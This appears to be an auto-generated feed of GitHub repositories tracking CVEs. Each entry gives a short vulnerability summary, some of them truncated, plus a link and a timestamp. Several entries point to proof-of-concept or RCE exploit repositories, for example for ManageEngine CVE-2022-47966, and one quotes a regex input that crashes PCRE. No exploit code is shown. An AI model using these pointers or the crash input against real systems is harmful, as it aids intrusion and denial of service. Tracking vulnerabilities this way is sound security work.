**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16310](https://github.com/Live-Hack-CVE/CVE-2017-16310) create time: 2023-01-19T22:02:10Z

**The WP SVG Icons WordPress plugin through 3.2.3 does not properly validate uploaded custom icon packs, allowing an high privileged user like an admin to upload a zip file containing malicious php code, leading to remote code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0863](https://github.com/Live-Hack-CVE/CVE-2022-0863) create time: 2023-01-19T22:03:20Z

**Insufficient input validation in ASP may allow an attacker with a malicious BIOS to potentially cause a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-20522](https://github.com/Live-Hack-CVE/CVE-2023-20522) create time: 2023-01-19T22:02:26Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16281](https://github.com/Live-Hack-CVE/CVE-2017-16281) create time: 2023-01-19T19:52:20Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: The CNA or individual who requested this candidate did not associate it with any vulnerability during 2020. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-1713](https://github.com/Live-Hack-CVE/CVE-2020-1713) create time: 2023-01-19T19:52:02Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: The CNA or individual who requested this candidate did not associate it with any vulnerability during 2020. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25714](https://github.com/Live-Hack-CVE/CVE-2020-25714) create time: 2023-01-19T19:51:17Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: The CNA or individual who requested this candidate did not associate it with any vulnerability during 2020. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25679](https://github.com/Live-Hack-CVE/CVE-2020-25679) create time: 2023-01-19T19:51:13Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: The CNA or individual who requested this candidate did not associate it with any vulnerability during 2020. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-1715](https://github.com/Live-Hack-CVE/CVE-2020-1715) create time: 2023-01-19T19:51:10Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: The CNA or individual who requested this candidate did not associate it with any vulnerability during 2020. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10765](https://github.com/Live-Hack-CVE/CVE-2020-10765) create time: 2023-01-19T19:51:06Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: The CNA or individual who requested this candidate did not associate it with any vulnerability during 2020. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10764](https://github.com/Live-Hack-CVE/CVE-2020-10764) create time: 2023-01-19T19:51:02Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: The CNA or individual who requested this candidate did not associate it with any vulnerability during 2020. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10694](https://github.com/Live-Hack-CVE/CVE-2020-10694) create time: 2023-01-19T19:50:58Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: The CNA or individual who requested this candidate did not associate it with any vulnerability during 2020. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10692](https://github.com/Live-Hack-CVE/CVE-2020-10692) create time: 2023-01-19T19:50:54Z

**Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in 3com – Asesor de Cookies para normativa española plugin <= 3.4.3 versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40697](https://github.com/Live-Hack-CVE/CVE-2022-40697) create time: 2023-01-19T19:52:14Z

**IBM Spectrum Virtualize 8.5, 8.4, 8.3, 8.2, and 7.8, under certain configurations, could disclose sensitive information to an attacker using man-in-the-middle techniques. IBM X-Force ID: 235408. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39167](https://github.com/Live-Hack-CVE/CVE-2022-39167) create time: 2023-01-19T19:52:10Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1676](https://github.com/Live-Hack-CVE/CVE-2022-1676) create time: 2023-01-19T19:52:06Z

**Authentication bypass in Netcomm router models NF20MESH, NF20, and NL1902 allows an unauthenticated user to access content. In order to serve static content, the application performs a check for the existence of specific characters in the URL (.css, .png etc). If it exists, it performs a "fake login" to give the reques CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4874](https://github.com/Live-Hack-CVE/CVE-2022-4874) create time: 2023-01-19T19:51:58Z

**On Netcomm router models NF20MESH, NF20, and NL1902 a stack based buffer overflow affects the sessionKey parameter. By providing a specific number of bytes, the instruction pointer is able to be overwritten on the stack and crashes the application at a known location. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4873](https://github.com/Live-Hack-CVE/CVE-2022-4873) create time: 2023-01-19T19:51:55Z

**A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4415](https://github.com/Live-Hack-CVE/CVE-2022-4415) create time: 2023-01-19T19:51:51Z

**ZenTao 16.4 to 18.0.beta1 is vulnerable to SQL injection. After logging in with any user, you can complete SQL injection by constructing a special request and sending it to function importNotice. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47745](https://github.com/Live-Hack-CVE/CVE-2022-47745) create time: 2023-01-19T19:51:41Z

**Seltmann GmbH Content Management System 6 is vulnerable to SQL Injection via /index.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47740](https://github.com/Live-Hack-CVE/CVE-2022-47740) create time: 2023-01-19T19:51:37Z

**An insecure default vulnerability exists in the Post Creation functionality of Ghost Foundation Ghost 5.9.4. Default installations of Ghost allow non-administrator users to inject arbitrary Javascript in posts, which allow privilege escalation to administrator via XSS. To trigger this vulnerability, an attacker can sen CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47197](https://github.com/Live-Hack-CVE/CVE-2022-47197) create time: 2023-01-19T19:51:33Z

**An insecure default vulnerability exists in the Post Creation functionality of Ghost Foundation Ghost 5.9.4. Default installations of Ghost allow non-administrator users to inject arbitrary Javascript in posts, which allow privilege escalation to administrator via XSS. To trigger this vulnerability, an attacker can sen CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47196](https://github.com/Live-Hack-CVE/CVE-2022-47196) create time: 2023-01-19T19:51:29Z

**An insecure default vulnerability exists in the Post Creation functionality of Ghost Foundation Ghost 5.9.4. Default installations of Ghost allow non-administrator users to inject arbitrary Javascript in posts, which allow privilege escalation to administrator via XSS. To trigger this vulnerability, an attacker can sen CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47195](https://github.com/Live-Hack-CVE/CVE-2022-47195) create time: 2023-01-19T19:51:25Z

**An insecure default vulnerability exists in the Post Creation functionality of Ghost Foundation Ghost 5.9.4. Default installations of Ghost allow non-administrator users to inject arbitrary Javascript in posts, which allow privilege escalation to administrator via XSS. To trigger this vulnerability, an attacker can sen CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47194](https://github.com/Live-Hack-CVE/CVE-2022-47194) create time: 2023-01-19T19:51:21Z

**A flaw named "EntryBleed" was found in the Linux Kernel Page Table Isolation (KPTI). This issue could allow a local attacker to leak KASLR base via prefetch side-channels based on TLB timing for Intel systems. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4543](https://github.com/Live-Hack-CVE/CVE-2022-4543) create time: 2023-01-19T19:50:50Z

**Cross-Site Request Forgery (CSRF) in GitHub repository modoboa/modoboa prior to 2.0.4. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0406](https://github.com/Live-Hack-CVE/CVE-2023-0406) create time: 2023-01-19T19:51:45Z

**The imap_body function in PHP before 4.4.4 does not implement safemode or open_basedir checks, which allows local users to read arbitrary files or list arbitrary directory contents. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2006-7204](https://github.com/Live-Hack-CVE/CVE-2006-7204) create time: 2023-01-19T17:40:24Z

**The exif_read_data function in the Exif module in PHP before 5.2.10 allows remote attackers to cause a denial of service (crash) via a malformed JPEG image with invalid offset fields, a different issue than CVE-2005-3353. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2009-2687](https://github.com/Live-Hack-CVE/CVE-2009-2687) create time: 2023-01-19T17:39:42Z

**The ZipArchive::getArchiveComment function in PHP 5.2.x through 5.2.14 and 5.3.x through 5.3.3 allows context-dependent attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted ZIP archive. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2010-3709](https://github.com/Live-Hack-CVE/CVE-2010-3709) create time: 2023-01-19T17:40:03Z

**The var_export function in PHP 5.2 before 5.2.14 and 5.3 before 5.3.3 flushes the output buffer to the user when certain fatal errors occur, even if display_errors is off, which allows remote attackers to obtain sensitive information by causing the application to exceed limits for memory, execution time, or recursion. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2010-2531](https://github.com/Live-Hack-CVE/CVE-2010-2531) create time: 2023-01-19T17:39:34Z

**Integer signedness error in zip_stream.c in the Zip extension in PHP before 5.3.6 allows context-dependent attackers to cause a denial of service (CPU consumption) via a malformed archive file that triggers errors in zip_fread function calls. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2011-1471](https://github.com/Live-Hack-CVE/CVE-2011-1471) create time: 2023-01-19T17:39:30Z

**The sapi_header_op function in main/SAPI.c in PHP 5.4.0RC2 through 5.4.0 does not properly determine a pointer during checks for %0D sequences (aka carriage return characters), which allows remote attackers to bypass an HTTP response-splitting protection mechanism via a crafted URL, related to improper interaction betw CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-4388](https://github.com/Live-Hack-CVE/CVE-2012-4388) create time: 2023-01-19T17:39:59Z

**net/netfilter/nf_conntrack_proto_dccp.c in the Linux kernel through 3.13.6 uses a DCCP header pointer incorrectly, which allows remote attackers to cause a denial of service (system crash) or possibly execute arbitrary code via a DCCP packet that triggers a call to the (1) dccp_new, (2) dccp_packet, or (3) dccp_error f CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-2523](https://github.com/Live-Hack-CVE/CVE-2014-2523) create time: 2023-01-19T17:40:32Z

**acinclude.m4, as used in the configure script in PHP 5.5.13 and earlier, allows local users to overwrite arbitrary files via a symlink attack on the /tmp/phpglibccheck file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-3981](https://github.com/Live-Hack-CVE/CVE-2014-3981) create time: 2023-01-19T17:39:55Z

**file before 5.19 does not properly restrict the amount of data read during a regex search, which allows remote attackers to cause a denial of service (CPU consumption) via a crafted file that triggers backtracking during processing of an awk rule. NOTE: this vulnerability exists because of an incomplete fix for CVE-20 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-3538](https://github.com/Live-Hack-CVE/CVE-2014-3538) create time: 2023-01-19T17:39:50Z

**Use-after-free vulnerability in ext/spl/spl_array.c in the SPL component in PHP through 5.5.14 allows context-dependent attackers to cause a denial of service or possibly have unspecified other impact via crafted ArrayIterator usage within applications in certain web-hosting environments. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-4698](https://github.com/Live-Hack-CVE/CVE-2014-4698) create time: 2023-01-19T17:39:46Z

**The nf_nat_redirect_ipv4 function in net/netfilter/nf_nat_redirect.c in the Linux kernel before 4.4 allows remote attackers to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact by sending certain IPv4 packets to an incompletely configured interface, a relate CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-8787](https://github.com/Live-Hack-CVE/CVE-2015-8787) create time: 2023-01-19T17:40:08Z

**The pcre_compile2 function in PCRE before 8.37 allows context-dependent attackers to compile incorrect code and cause a denial of service (out-of-bounds read) via regular expression with a group containing both a forward referencing subroutine call and a recursive back reference, as demonstrated by "((?+1)(\1))/". CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-2326](https://github.com/Live-Hack-CVE/CVE-2015-2326) create time: 2023-01-19T17:39:38Z

**The Zone::New function in zone.cc in Google V8 before 5.0.71.47, as used in Google Chrome before 50.0.2661.102, does not properly determine when to expand certain memory allocations, which allows remote attackers to cause a denial of service (buffer overflow) or possibly have unspecified other impact via crafted JavaSc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-1669](https://github.com/Live-Hack-CVE/CVE-2016-1669) create time: 2023-01-19T17:40:28Z

**The tcpmss_mangle_packet function in net/netfilter/xt_TCPMSS.c in the Linux kernel before 4.11, and 4.9.x before 4.9.36, allows remote attackers to cause a denial of service (use-after-free and memory corruption) or possibly have unspecified other impact by leveraging the presence of xt_TCPMSS in an iptables action. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-18017](https://github.com/Live-Hack-CVE/CVE-2017-18017) create time: 2023-01-19T17:40:20Z

**The HMAC implementation (crypto/hmac.c) in the Linux kernel before 4.14.8 does not validate that the underlying cryptographic hash algorithm is unkeyed, allowing a local attacker able to use the AF_ALG-based hash interface (CONFIG_CRYPTO_USER_API_HASH) and the SHA-3 hash algorithm (CONFIG_CRYPTO_SHA3) to cause a kernel CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-17806](https://github.com/Live-Hack-CVE/CVE-2017-17806) create time: 2023-01-19T17:40:16Z

**kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect BPF_RSH signed bounds calculations. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-17853](https://github.com/Live-Hack-CVE/CVE-2017-17853) create time: 2023-01-19T17:40:12Z

**In the Linux kernel before 4.16.4, a double free vulnerability in the f_midi_set_alt function of drivers/usb/gadget/function/f_midi.c in the f_midi driver may allow attackers to cause a denial of service or possibly have unspecified other impact. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-20961](https://github.com/Live-Hack-CVE/CVE-2018-20961) create time: 2023-01-19T17:40:41Z

**drivers/net/wireless/rsi/rsi_91x_usb.c in the Linux kernel through 5.2.9 has a Double Free via crafted USB device traffic (which may be remote via usbip or usbredir). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-15504](https://github.com/Live-Hack-CVE/CVE-2019-15504) create time: 2023-01-19T17:40:36Z

**Jeecg-boot v3.4.4 was discovered to contain a SQL injection vulnerability via the component /sys/dict/queryTableData. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47105](https://github.com/Live-Hack-CVE/CVE-2022-47105) create time: 2023-01-19T17:39:24Z

**The Events Made Easy plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on several functions related to AJAX actions in versions up to, and including, 2.3.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke those functi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0404](https://github.com/Live-Hack-CVE/CVE-2023-0404) create time: 2023-01-19T17:39:20Z

**The Social Warfare plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.4.0. This is due to missing or incorrect nonce validation on several AJAX actions. This makes it possible for unauthenticated attackers to delete post meta information and reset network access tokens, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0403](https://github.com/Live-Hack-CVE/CVE-2023-0403) create time: 2023-01-19T17:39:15Z

**The Social Warfare plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on several AJAX actions in versions up to, and including, 4.3.0. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to delete post meta information and reset netw CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0402](https://github.com/Live-Hack-CVE/CVE-2023-0402) create time: 2023-01-19T17:39:11Z

**A vulnerability was found in Nayshlok Voyager. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file Voyager/src/models/DatabaseAccess.java. The manipulation leads to sql injection. The name of the patch is f1249f438cd8c39e7ef2f6c8f2ab76b239a02fae. It is recommended to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125074](https://github.com/Live-Hack-CVE/CVE-2014-125074) create time: 2023-01-19T16:29:57Z

**A vulnerability was found in jfm-so piWallet. It has been rated as critical. Affected by this issue is some unknown functionality of the file api.php. The manipulation of the argument key leads to sql injection. The name of the patch is b420f8c4cbe7f06a34d1b05e90ee5cdfe0aa83bb. It is recommended to apply a patch to fix CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20168](https://github.com/Live-Hack-CVE/CVE-2017-20168) create time: 2023-01-19T16:30:18Z

**A vulnerability was found in Prestaul skeemas and classified as problematic. This issue affects some unknown processing of the file validators/base.js. The manipulation of the argument uri leads to inefficient regular expression complexity. The name of the patch is 65e94eda62dc8dc148ab3e59aa2ccc086ac448fd. It is recomm CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25074](https://github.com/Live-Hack-CVE/CVE-2018-25074) create time: 2023-01-19T16:30:22Z

**A vulnerability was found in mholt PapaParse up to 5.1.x. It has been classified as problematic. Affected is an unknown function of the file papaparse.js. The manipulation leads to inefficient regular expression complexity. Upgrading to version 5.2.0 is able to address this issue. The name of the patch is 235a12758cd77 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36649](https://github.com/Live-Hack-CVE/CVE-2020-36649) create time: 2023-01-19T16:30:27Z

**An issue was discovered in function httpProcDataSrv in TL-WDR7660 2.0.30 that allows attackers to execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37774](https://github.com/Live-Hack-CVE/CVE-2021-37774) create time: 2023-01-19T16:30:01Z

**Multiple Zoho ManageEngine on-premise products** : [p33d/CVE-2022-47966](https://github.com/p33d/CVE-2022-47966) create time: 2023-01-19T16:06:56Z

**no description** : [MONK-MODE/CVE-2023-XXXX](https://github.com/MONK-MODE/CVE-2023-XXXX) create time: 2023-01-19T14:02:38Z

**The vulnerability allows a remote unauthenticated attacker to download a backup file, if one exists. That backup file might contain sensitive information like credentials and cryptographic material. A valid user has to create a backup after the last reboot for this attack to be successfull. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3738](https://github.com/Live-Hack-CVE/CVE-2022-3738) create time: 2023-01-19T13:15:19Z

**POC for CVE-2022-47966 affecting multiple ManageEngine products** : [horizon3ai/CVE-2022-47966](https://github.com/horizon3ai/CVE-2022-47966) create time: 2023-01-17T21:26:28Z

**Cloud Mobility for Dell EMC Storage, versions 1.3.0.X and below contains an Improper Check for Certificate Revocation vulnerability. A threat actor does not need any specific privileges to potentially exploit this vulnerability. An attacker could perform a man-in-the-middle attack and eavesdrop on encrypted communicati CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23690](https://github.com/Live-Hack-CVE/CVE-2023-23690) create time: 2023-01-19T13:15:23Z

**A vulnerability classified as critical has been found in oktora24 2moons. Affected is an unknown function. The manipulation leads to sql injection. The name of the patch is 1b09cf7672eb85b5b0c8a4de321f7a4ad87b09a7. It is recommended to apply a patch to fix this issue. VDB-218898 is the identifier assigned to this vulne CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-10014](https://github.com/Live-Hack-CVE/CVE-2013-10014) create time: 2023-01-19T12:07:59Z

**A vulnerability has been found in Anant Labs google-enterprise-connector-dctm up to 3.2.3 and classified as critical. Affected by this vulnerability is an unknown functionality. The manipulation of the argument username/domain leads to sql injection. The name of the patch is 6fba04f18ab7764002a1da308e7cd9712b501cb7. It CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125083](https://github.com/Live-Hack-CVE/CVE-2014-125083) create time: 2023-01-19T12:08:04Z

**A vulnerability was found in viakondratiuk cash-machine. It has been declared as critical. This vulnerability affects the function is_card_pin_at_session/update_failed_attempts of the file machine.py. The manipulation leads to sql injection. The name of the patch is 62a6e24efdfa195b70d7df140d8287fdc38eb66d. It is recom CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10069](https://github.com/Live-Hack-CVE/CVE-2015-10069) create time: 2023-01-19T12:08:22Z

**A vulnerability was found in gitter-badger ezpublish-modern-legacy. It has been rated as problematic. This issue affects some unknown processing of the file kernel/user/forgotpassword.php. The manipulation leads to weak password recovery. Upgrading to version 1.0 is able to address this issue. The name of the patch is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10071](https://github.com/Live-Hack-CVE/CVE-2015-10071) create time: 2023-01-19T12:08:12Z

**A vulnerability was found in copperwall Twiddit. It has been rated as critical. This issue affects some unknown processing of the file index.php. The manipulation leads to sql injection. The name of the patch is 2203d4ce9810bdaccece5c48ff4888658a01acfc. It is recommended to apply a patch to fix this issue. The identifi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10070](https://github.com/Live-Hack-CVE/CVE-2015-10070) create time: 2023-01-19T12:08:08Z

**A vulnerability was found in bastianallgeier Kirby Webmentions Plugin and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to injection. The attack may be launched remotely. The name of the patch is 55bedea78ae9af916a9a41497bd9996417851502. It is recommended to app CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20174](https://github.com/Live-Hack-CVE/CVE-2017-20174) create time: 2023-01-19T12:08:26Z

**A vulnerability was found in MyCMS. It has been classified as problematic. This affects the function build_view of the file lib/gener/view.php of the component Visitors Module. The manipulation of the argument original/converted leads to cross site scripting. It is possible to initiate the attack remotely. The name of CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4892](https://github.com/Live-Hack-CVE/CVE-2022-4892) create time: 2023-01-19T12:08:31Z

**no description** : [Trinadh465/linux-4.19.72_CVE-2022-45934](https://github.com/Trinadh465/linux-4.19.72_CVE-2022-45934) create time: 2023-01-19T11:58:08Z

**Truncated Allocation Leading to Out of Bounds Write Via Large Number of Attributes** : [0xDSousa/CVE-2022-23521](https://github.com/0xDSousa/CVE-2022-23521) create time: 2023-01-19T11:50:21Z

**PoC for cve-2022-47966** : [shameem-testing/PoC-for-ME-SAML-Vulnerability](https://github.com/shameem-testing/PoC-for-ME-SAML-Vulnerability) create time: 2023-01-19T11:41:05Z

**A malicious / defect bluetooth controller can cause a Denial of Service due to unchecked input in le_read_buffer_size_complete. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0397](https://github.com/Live-Hack-CVE/CVE-2023-0397) create time: 2023-01-19T12:08:35Z

**Cross-Site Request Forgery (CSRF) in GitHub repository modoboa/modoboa prior to 2.0.4. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0398](https://github.com/Live-Hack-CVE/CVE-2023-0398) create time: 2023-01-19T12:08:17Z

**A path traversal in smbserver.py allows an attacker to read/write arbitrary files on the server.** : [p0dalirius/CVE-2021-31800-Impacket-SMB-Server-Arbitrary-file-read-write](https://github.com/p0dalirius/CVE-2021-31800-Impacket-SMB-Server-Arbitrary-file-read-write) create time: 2022-08-28T19:04:46Z

**CVE-2022-47966 ManageEngine unauthenticated RCE exploit via the SAML request,** : [ralph-morrinson/CVE-2022-47966-RCE-PoC](https://github.com/ralph-morrinson/CVE-2022-47966-RCE-PoC) create time: 2023-01-19T10:41:26Z

**The WebGL subsystem in Mozilla Firefox before 20.0, Firefox ESR 17.x before 17.0.5, Thunderbird before 17.0.5, Thunderbird ESR 17.x before 17.0.5, and SeaMonkey before 2.17 on Linux does not properly interact with Mesa drivers, which allows remote attackers to execute arbitrary code or cause a denial of service (free o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-0796](https://github.com/Live-Hack-CVE/CVE-2013-0796) create time: 2023-01-19T06:38:49Z

**net/ceph/auth_x.c in Ceph, as used in the Linux kernel before 3.16.3, does not properly consider the possibility of kmalloc failure, which allows remote attackers to cause a denial of service (system crash) or possibly have unspecified other impact via a long unencrypted auth ticket. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-6417](https://github.com/Live-Hack-CVE/CVE-2014-6417) create time: 2023-01-19T06:38:45Z

**A Denial of Service vulnerability exists in ircd-ratbox 3.0.9 in the MONITOR Command Handler. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-5290](https://github.com/Live-Hack-CVE/CVE-2015-5290) create time: 2023-01-19T06:38:17Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.333 and 19.x through 21.x before 21.0.0.182 on Windows and OS X and before 11.2.202.577 on Linux, Adobe AIR before 21.0.0.176, Adobe AIR SDK before 21.0.0.176, and Adobe AIR SDK & Compiler before 21.0.0.176 allows attackers to execute arbitrary code via u CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0991](https://github.com/Live-Hack-CVE/CVE-2016-0991) create time: 2023-01-19T06:38:41Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.333 and 19.x through 21.x before 21.0.0.182 on Windows and OS X and before 11.2.202.577 on Linux, Adobe AIR before 21.0.0.176, Adobe AIR SDK before 21.0.0.176, and Adobe AIR SDK & Compiler before 21.0.0.176 allows attackers to execute arbitrary code via u CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0988](https://github.com/Live-Hack-CVE/CVE-2016-0988) create time: 2023-01-19T06:38:37Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4279, CVE-2016-6921, CVE-2016-6923, CVE-2016-6925, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4272](https://github.com/Live-Hack-CVE/CVE-2016-4272) create time: 2023-01-19T06:38:28Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4272, CVE-2016-4279, CVE-2016-6921, CVE-2016-6925, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6923](https://github.com/Live-Hack-CVE/CVE-2016-6923) create time: 2023-01-19T06:38:24Z

**Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4166](https://github.com/Live-Hack-CVE/CVE-2016-4166) create time: 2023-01-19T06:38:12Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4272, CVE-2016-4279, CVE-2016-6921, CVE-2016-6923, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6925](https://github.com/Live-Hack-CVE/CVE-2016-6925) create time: 2023-01-19T06:38:04Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4272, CVE-2016-4279, CVE-2016-6921, CVE-2016-6923, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6926](https://github.com/Live-Hack-CVE/CVE-2016-6926) create time: 2023-01-19T06:38:00Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4272, CVE-2016-4279, CVE-2016-6921, CVE-2016-6923, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6927](https://github.com/Live-Hack-CVE/CVE-2016-6927) create time: 2023-01-19T06:37:56Z

**In WordPress before 5.3.1, authenticated users with lower privileges (like contributors) can inject JavaScript code in the block editor, which is executed within the dashboard. It can lead to an admin opening the affected post in the editor leading to XSS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16781](https://github.com/Live-Hack-CVE/CVE-2019-16781) create time: 2023-01-19T06:38:20Z

**In wp-includes/formatting.php in WordPress 3.7 to 5.3.0, the function wp_targeted_link_rel() can be used in a particular way to result in a stored cross-site scripting (XSS) vulnerability. This has been patched in WordPress 5.3.1, along with all the previous WordPress versions from 3.7 to 5.3 via a minor release. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20042](https://github.com/Live-Hack-CVE/CVE-2019-20042) create time: 2023-01-19T06:38:08Z

